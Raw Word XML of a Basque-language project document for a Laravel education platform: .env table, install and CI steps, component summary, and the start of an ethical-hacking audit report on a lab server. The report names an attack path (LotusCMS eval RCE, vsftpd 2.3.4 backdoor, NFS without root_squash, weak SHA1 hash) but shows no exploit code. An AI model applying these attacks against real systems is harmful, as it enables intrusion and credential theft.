      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>):*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modalen fokuaren kudeaketa (Focus trapping), Tab teklaren bidezko nabigazioa, Escape tekla bidez modalak ixtea, administrazio-fitxetan gezi/Home/End nabigazioa eta aria-selected zein aria-busy atributu egokiak ezarrita daude.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="450"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="285"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>13. .env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> ingurune-konfi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>gurazioa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1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="aa"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblInd w:w="0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0233D">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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Aldagaia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Zer kontrolatzen du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Adibide segurua / Balioa</w:t>
            </w:r>
          </w:p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APP_NAME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Aplikazioaren izen ofiziala.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Eskolak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APP_ENV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Exekuzio ingurunea.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 / production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APP_KEY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Enkriptazio gakoa.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base64:... (Sekretua)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APP_DEBUG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Errore teknikoen xehetasunak erakustea.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 (Produkzioan)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APP_URL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Aplikazioaren oinarrizko URLa.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https://eskolak.example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APP_LOCALE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Hizkuntza lehenetsia.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 / eu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DB_CONNECTION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Datu-base motorra.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mysql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DB_HOST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Datu-base zerbitzariaren IPa.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127.0.0.1 / 192.168.20.10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DB_PORT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MySQL ataka.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3306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DB_DATABASE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Datu-basearen izena.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Talde3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SESSION_DRIVER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Saioak biltegiratzeko lekua.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MAIL_MAILER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Posta garraioa.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smtp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MAIL_HOST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SMTP zerbitzaria.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smtp.gmail.com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MAIL_PORT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SMTP ataka.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587</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="450"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="360"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>14. Instalazioa eta exekuzio-gida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pict>
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>14.1. Urratsak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Sartu aplikazioaren direktorioan: cd Ikasgune</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Instalatu backend mendekotasunak: composer install</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Instalatu frontend mendekotasunak: npm install</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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 xml:space="preserve">Kopiatu ingurune fitxategia: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>cp .env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>.example .env</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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 xml:space="preserve">Sortu Laravel enkriptazio gakoa: php artisan </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>key:generate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Exekutatu migrazioak: php artisan migrate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Abiarazi garapen zerbitzariak: npm run dev eta php artisan serve</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="30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14.2. Komando erabilgarriak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before="180" w:after="180" w:line="335" w:lineRule="auto"/>
        <w:ind w:left="180" w:right="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
        </w:rPr>
        <w:t>php artisan migrate               # Migrazio pendienteak aplika</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
        </w:rPr>
        <w:t>tu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
        </w:rPr>
        <w:br/>
        <w:t>php artisan migrate:fresh         # Datu-basea berriro eraiki</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
        </w:rPr>
        <w:br/>
        <w:t>php artisan route:list            # Ibilbide guztiak ikusi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
        </w:rPr>
        <w:br/>
        <w:t>php artisan test                  # PHPUnit testak exekutatu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
        </w:rPr>
        <w:br/>
        <w:t>npm run build                     # Frontend asset-ak konpilatu (Produk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
        </w:rPr>
        <w:t>zioa)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
        </w:rPr>
        <w:br/>
        <w:t>composer audit                    # Mendekotasunen segurtasun auditoa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="360"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>15. Probak, kalitatea eta CI/CD pipeline-a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pict>
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>15.1. GitHub Actions CI prozesua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333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>CI/CD pipeline-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>a .github</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>/workflows bidez definituta dago. Urrats nagusiak:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Kodearen Checkout-a.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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PHP 8.4 eta Node.js 20 inguruneak prestatzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Composer eta NPM paketeak instalatzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Asset-ak konpilatzea (npm run build).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Formatua egiaztatzea: vendor/bin/pint --test.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Analisi estatikoa: vendor/bin/phpstan analyse (Larastan Maila 5).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Kode bikoiztua detektatzea: jscpd (%5 atalasea).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Mendekotasunen segurtasuna: composer audit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Test suite-a exekutatzea: php artisan test --coverage --min=80.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="450"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="360"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>16. Proiektuaren egungo egoera eta hobekuntza-proposamenak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pict>
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>16.1. Antzemandako dokumentazio-oharra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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Proiektuaren erroan dagoen Diagrama.png fitxategiak datu-basearen bertsio zaharrago bat erakusten du. Gomendatzen da ER diagrama berriro sortzea egungo migrazio aktiboekin bat etor dadin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>16.2. Hobekuntza posibleak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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ER Diagrama eguneratua sortzea eta dokum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>entazio honetan txertatzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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Produkziorako deployment automatizatuaren prozedura osatzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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333333"/>
        </w:rPr>
        <w:t>Audit Log (ekintzen erregistroa) fitxategi bat inplementatzea administratzaileen ekintza kritikoentzat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="450"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="285"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>17. Ondorioak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333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Eskolak Laravel 13 framework-ean oinarritutako hezkuntza-plataforma sendo, modular eta segurua da. Aplikazioak argi bereizten ditu erabiltzaile-rolak eta horien lan-fluxuak baimen-sistema zorrotz baten bidez kudeatzen ditu. Datu-basearen erlazioek eta Eloq</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>uent ORM-ak datuen osotasuna bermatzen dute, eta Proxmox bidezko azpiegiturak isolamendua eta segurtasuna eskaintzen ditu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="450"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="285"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Eranskina A · Osagai nagusien laburpena</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B166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1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ab"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblInd w:w="0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0233D">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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Osagaia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Klase / Fitxategi Nagusia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1F4E7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Ardura Nagusia</w:t>
            </w:r>
          </w:p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Autentifikazioa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Auth/SessionController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Saio hasiera eta amaiera (Login / Logout).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Erregistroa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Auth/RegistrationController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Alta, posta-kodearen sorkuntza eta egiaztapena.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Google OAuth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Auth/GoogleAuthController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Google bidezko sarbide segurua.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Pasahitza Berreskuratzea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Auth/PasswordController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Berrezartze esteka eta pasahitz berriaren kudeaketa.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Ikastaroak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CourseController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Katalogoaren bistaratzea, iragazkiak eta bilaketa.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Matrikulazioak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EnrollmentController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Ikasleen izen-emateak eta "Nire ikastaroak" gunea.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Administrazioa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AdminController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Panel nagusia eta orokorren estatistikak.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Erabiltzaileen Admin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AdminUserController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Erabiltzaileen CRUD kudeaketa eta rolak.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Ikastaroen Admin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AdminCourseController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Ikastaroen kudeaketa administratiboa.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Klaseen Kudeaketa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SchoolClassController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Klaseen sorrera eta irakasleen esleipena.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Irakasle Gunea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TeacherController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Irakaslearen ikastaroak, ikasleak eta materialak.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Profil Orokorra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AccountProfileController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 pertsonalen eta pasahitzaren aldaketa.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Profil Akademikoa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StudentProfileController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Jaiotze-data eta klase esleipena.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Baimenak (Gates)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AppServiceProvider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access-admin, access-teacher, manage-course.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Hizkuntza (Locale)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SetLocale Middleware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Hizkuntza aktiboa ezartzea (es, eu, en).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D"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Ikasle Profil Kontrola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EnsureStudentProfile Middleware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312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0233D" w:rsidRDefault="003B1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Profil akademikoa osatu gabe badago birbideratzea.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E023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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:widowControl/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Eranskina B Pentesting auditoretzaren txostena</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SEGURTASUN AUDITORIAREN TXOSTENA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PENTESTING — HACKING ETIKOA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Helburuko Sistema: 192.168.10.22</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="9240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57"/>
        <w:gridCol w:w="6183"/>
      </w:tblGrid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Data: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2026-10-02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Erasotzailearen IPa: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192.168.10.11 (Kali Linux)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Helburuko IPa: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192.168.10.22 (Ubuntu Linux)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Metodologia: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Kutxa Grisa (Gray Box) — zerbitzariaren IPa soilik ezagutzen zen aurretiaz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Kokapena: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Tokiko Sarea (Barne Auditoria)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Sailkapena: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ISILPEKOA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="360" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1. LABURPEN EXEKUTIBOA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Ikuskapen honen helburu nagusia 192.168.10.22 helbideko zerbitzariaren segurtasun-maila ebaluatzea izan da, Kutxa Grisa (Gray Box) metodologia jarraituz: aurretiaz helburuko IPa bakarrik ezagutzen zen, barne-konfigurazioen edo kodearen ezagutzarik gabe. Pr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>oba hauek barne-sare beretik bideratu dira, Kali Linux sistema eragilea duen ekipo batetik (192.168.10.11), kanpoko erasotzaile baten portaera errealista simulatzeko.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 xml:space="preserve">Azterketan zehar 4 ahultasun identifikatu dira, horietatik 3 KRITIKO sailkapenarekin eta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1 ALTUA sailkapenarekin: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 xml:space="preserve">LotusCMS 3.0 — Urruneko Kode Exekuzioa (RCE) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eval(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) bidez — CVE-2012-1623 (KRITIKOA)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vsftpd 2.3.4 — Backdoor bidezko root shell — CVE-2011-2523 (KRITIKOA)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 xml:space="preserve">NFS — Sistema fitxategiak autentifikazio gabe irakurgai, root_squash gabeko </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>konfigurazioa — Konfigurazio okerra (KRITIKOA)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LotusCMS Admin — Pasahitz ahula eta SHA1 hash babesgabea (gatzik gabe) — Autentifikazio ahula (ALTUA)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Hiru ahultasunek sistemarako sarbide zabala ematen dute: bi kasutan (vsftpd backdoor eta NFS) zuzenean sist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ema eragileko mailan lortzen da sarbidea, eta hirugarrenean (LotusCMS RCE) urruneko kode-exekuzioa lortu eta, ondoren, kredentzialak lapurtuz, aplikazio-mailako kontrol administratiboa lortu da.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="360" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2. AUDITORIAREN EREMUA ETA METODOLOGIA</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="9240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57"/>
        <w:gridCol w:w="6183"/>
      </w:tblGrid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Helburuko IPa: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192.168</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.10.22 (Ubuntu Linux)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Erasotzailearen IPa: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192.168.10.11 (Kali Linux)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lastRenderedPageBreak/>
